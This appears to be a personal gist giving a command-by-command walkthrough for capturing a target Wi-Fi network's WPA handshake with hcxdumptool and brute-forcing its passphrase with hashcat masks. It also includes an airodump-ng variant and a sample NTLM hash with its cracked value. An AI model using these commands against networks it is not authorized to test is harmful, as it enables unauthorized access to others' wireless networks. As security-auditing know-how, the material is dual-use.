Find out if your Wifi adapter supports monitor mode

Windows: netsh wlan show wirelesscapabilities in admin cmd shell, look for Network monitor mode.

Linux: iw list | grep -Fe "Supported interface modes" -n10, look for * monitor in section Supported interface modes:.

In Kali Linux

I boot a live Kali 2024.1 on a 8G USB stick on a Acer ES1-531-P8NJ and install hcxdumptool and hcxtools from the official repo. The version of hcxdumptool from the repo is 6.3.1 as of 20240420.

Stop Wifi related services

sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant

Find the Wifi interface

iwconfig
iw list

Generate mask (Based on target wifi addr)

sudo tcpdump -i wlan0 wlan addr3 TA:RG:ET:__:_M:AC -ddd > attack.bpf

Capture packets

sudo hcxdumptool -i wlan0 -w dumpfile.pcapng --rds=1 --bpf=attack.bpf

Replace wlan with your Wifi interface name. Add -c 1a for looking at channel 1 only.

Convert to a hc22000 format that hashcat do understand

hcxpcapngtool ./dumpfile.pcapng -o test.hc22000

View the hc22000 file content

hcxhashtool -i test.hc22000 --info=stdout

Brute force crack with hashcat (8-12 chars, including letters and number)

hashcat --hwmon-disable -m22000 -a3 -i -1 ?l?u?d .\test.hc22000 "?1?1?1?1?1?1?1?1?1?1?1?1"

I transferred the hc22000 file to my Windows PC and use hashcat (v6.2.6) to crack it.

Note

hcxdumptool does not work on the internal Wifi of Rasp Pi 4b.
Hashcat test: hashcat -m1000 -a3 -i 42EF98F2E9B77304716D2AECA2F0BD96 ?a?a?a?a?a?a?a, the password should be *H4cK*.
Packet capturing with airodump-ng seems to work on Rasp Pi 4b. Commands are sudo airodump-ng wlan0mon -c 13 --bssid TA:RG:ET:__:_M:AC -w dumpfile and hcxpcapngtool dumpfile.cap -o test.hc22000

rikka0w0/hcxdumptool_hashcat_kali.md